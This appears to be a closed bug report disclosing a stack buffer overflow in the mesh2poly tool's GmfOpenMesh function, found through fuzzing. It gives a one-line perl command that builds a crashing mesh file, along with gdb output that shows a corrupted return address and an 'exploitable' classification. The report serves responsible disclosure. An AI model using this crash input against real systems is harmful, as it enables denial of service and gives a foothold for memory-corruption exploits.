Closed
Description
Hi folks,
An interesting crash was found while fuzz testing of the mesh2poly binary which can be triggered via a malformed mesh file. Although the below malformed file only crashes the program as-is, it could potentially be crafted further and create a security issue where these kinds of files would be able compromise the process's memory through taking advantage of affordances given by memory corruption. It's recommend to harden the code to prevent these kinds of bugs as it could greatly mitigate such this issue and even future bugs.
crash.mesh (create file from scratch, no magic bytes necessary)
echo -ne `perl -e 'print "B" x 2176'` > test.mesh
debug log
(gdb) r test.mesh /tmp/empty.mesh
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: mesh2poly test.mesh /tmp/empty.mesh
*** stack smashing detected ***: terminated
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7ddb859 in __GI_abort () at abort.c:79
#2 0x00007ffff7e463ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f7007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7ee8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26
#4 0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24
#5 0x000055555555b5d2 in GmfOpenMesh ()
#6 0x4242424242424242 in ?? ()
#7 0x0000000000000000 in ?? ()
(gdb) exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)
Metadata
Metadata
Assignees
Labels
No labels